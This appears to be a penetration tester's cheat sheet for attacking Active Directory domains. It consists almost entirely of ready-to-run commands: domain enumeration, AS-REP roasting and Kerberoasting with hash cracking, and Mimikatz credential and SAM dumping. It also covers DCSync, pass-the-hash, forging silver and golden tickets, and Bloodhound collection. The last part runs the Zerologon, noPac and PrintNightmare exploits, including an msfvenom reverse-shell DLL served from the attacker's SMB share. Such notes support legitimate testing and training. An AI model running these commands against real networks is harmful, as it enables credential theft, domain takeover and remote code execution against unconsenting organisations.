This is a cheatsheet of tools and commands that I use to pentest Active Directory. It includes Windows, Impacket and PowerView commands, how to use Bloodhound and popular exploits such as Zerologon and NO-PAC.
See local accounts
net user
See all of the accounts in the domain
net user /domain
Check if an account is a Domain Admin
net user <account-name> domain
See groups in the AD domain
net group /domain
Sync the clock with the DC (Domain Controller).
ntpdate <dc-ip>
. .\PowerView.ps1
Information about the domain
Get-NetDomain
Get-NetDomain-Controller
Get-Domain-Policy
See password rules
(Get-DomainPolicy)."system access"
Information about users Look for passwords/personal information in the description
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select description
Get-NetUser | select samaccountname
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties logoncount
Information about computers
Get-NetComputer
Get-NetComputer -FullData
Get-NetGroup
Get-NetGroup -GroupName <group-name>
Get-NetGroup -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Domain Admins"
See SMB shares
Invoke-ShareFinder
A few quick commands that I always use if I have no information about the machine
crackmapexec smb <ip>
crackmapexec smb <ip> -u '' -p ''
crackmapexec smb <ip> -u 'guest' -p ''
With a list of valid usernames and no passwords, you can check if Kerberos has pre-authentication disabled by ASREP-Roasting
impacket-GetNPUsers -format john -dc-ip <dc-ip> -usersfile <users-list> <name_of_domain>/<hostname>
or
python3 GetNPUsers.py <domain>/<user> -no-pass -dc-ip <dc-ip>
To crack obtained hashes, save them in a file and give it to John. I usually use rockyou.txt to brute-force the passwords
john --wordlist=<passwords-file> <hashes-file>
Alternative
hashcat -m 18200 -a 0 <hashes-file> <passwords-file>
If you obtained any passwords, check them
crackmapexec smb <ip> -U <user> -p <password>
If they are valid, further enumerate the domain
crackmapexec smb <ip> -U <user> -p <password> --shares
crackmapexec smb <ip> -U <user> -p <password> --rid-brute
crackmapexec smb <ip> -U <user> -p <password> --users
crackmapexec smb <ip> -U <user> -p <password> --lsa
Try to connect using Windows Remote Management
crackmapexec winrm <ip> -U <user> -p <password>
Try to connect using pass-the-hash (the user needs to have administrative rights)
pth-winexe -U <user>%<hash>%<SMB-share-in-UNC-format> //<ip> cmd
Two different ways to perform this attack.
-
From your attacking machine, using Impacket
impacket-GetUserSPNs -dc-ip <ip> <domain>/<user>
If successful
impacket-GetUserSPNs -dc-ip <ip> <domain>/<user> --request
To crack the hash
hashcat -m 13100 -a 0 <hash> <wordlist> --force
-
On the target machine, using Mimikatz
Generate tickets in Powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<service>/<hostname>.<domain>.com'
klist
In Mimikatz
kerberos::list /export
Grab the tickets and crack them
python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <tickets>
If you managed to get access on the machine and you are able to transfer Mimikatz, you can use the following commands.
privilege::debug
Dump credentials of all logged-in users
sekurlsa::logonpasswords
lsadump::lsa /patch
Dump the SAM database (equivalent to hashdump in a Meterpreter shell)
token::elevate
lsadump::sam
Overpass-the-hash
sekurlsa::pth /user:<username> /domain:<domain-name> /ntlm:<ntlm-hash> /run:PowerShell.exe
Pass-the-ticket (silver ticket)
Get the SID of the user
whoami /user
In Mimikatz
kerberos::purge kerberos::golden /user:<username> /domain:<domain-name> /sid:<sid> /target:<url> /service:<service> /rc4:<rc4hash> /ptt
If you have a silver ticket, connect using Impacket
export KRBSCCNAME=<path-to-silver-ticket>
impacket-wmiexec -k -no-pass <username>@<domain>
Golden ticket
If we get the krbtgt (password hash of domain user account), we can create our own golden tickets = custom TGTs)
Get the krbtgt
privilege::debug
lsadump::lsa /patch
kerberos::purge
Create a golden ticket
kerberos::golden /user:<fake-username> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt-hash> /ptt
Launch a new cmd
misc::cmd
Use PsExec to escalate privileges
psexec.exe \<dc-name> cmd.exe
DC-SYNC
lsadump::dcsync /user:Administrator
Bloodhound needs an ingestor to retrieve files that then have to be uploaded in the application lying on your attack machine.
Bloodhound-Python
bloodhound-python -c All -u <user> -p <password> -gc '<hostname>.<domain-name>' -dc '<hostname>.<domain-name>' -d '<domain-name>' -ns <dc-ip>
Sharphound
You can use Sharphound two ways.
- Transfer the .exe file (which you can download from here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) on the target machine and run it with the following command
SharpHound.exe -c All
- Transfer the Sharphound.ps1 Powershell script on the target machine and run it
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain <domain-name> -ZipFileName loot.zip
This exploit should be used very carefully and with the guarantee that it can be reversed. It changed the domain controller's password and interrupts communication with other computers in the domain.
To test
the vulnerability without exploiting it, I used the following script: https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py <DC-name> <DC-ip>
To exploit it, you can find the Zerologon exploit here: https://github.com/dirkjanm/CVE-2020-1472, as well as restoration steps.
python3 cve-2020-1472-exploit.py <DC-name> <DC-ip>
Get all of the information (usernames + hashes)
impacket-secretsdump -just-dc <domain>/<DC-name>$@<DC-ip>
To restore
Get the lanman_hash:ntlm_hash from the output of the previous command
impacket-secretsdump administrator@<DC-ip> -hashes <lanman_hash:ntlm_hash>
Obtain the plaintext password from the output of the previous command
python3 restorepassword.py <domain>/<DC-name>@<DC-name> -target-ip <DC-ip> -hexpass <plaintext-password>
This exploit is possible if you have any valid credentials from a user in the Active Directory. You can find the exploit here: https://github.com/WazeHell/sam-the-admin
python3 sam_the_admin.py -dc-ip <DC-ip> <domain>/<user>:<password>
You can find the exploit here: https://github.com/cube0x0/CVE-2021-1675
For this exploit, you need valid user credentials.
Check if the system is vulnerable:
rpcdump.py <target-ip> | egrep 'MS-RPRN|MS-PAR'
If you get Print System Asynchronous Remote Protocol & Print System Remote Protocol
in the output, it is vulnerable.
Create a .dll file to execute the reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=<target-ip> LPORT=<target-port> > shell.dll
Start a listener on the port used in the command.
Host the file on Samba
smbserver.py share pwd -smb2support
python3 CVE-2021-1675.py <domain>/<user>:<password>@<target-ip> '\<attacking-machine-ip>\share\shell.dll'
Some cheatsheets that I've used in the past and I've found very useful are:
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://gist.github.com/Rajchowdhury420/da4d12a3db13aa5232fcd4e7d96ec6a1
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a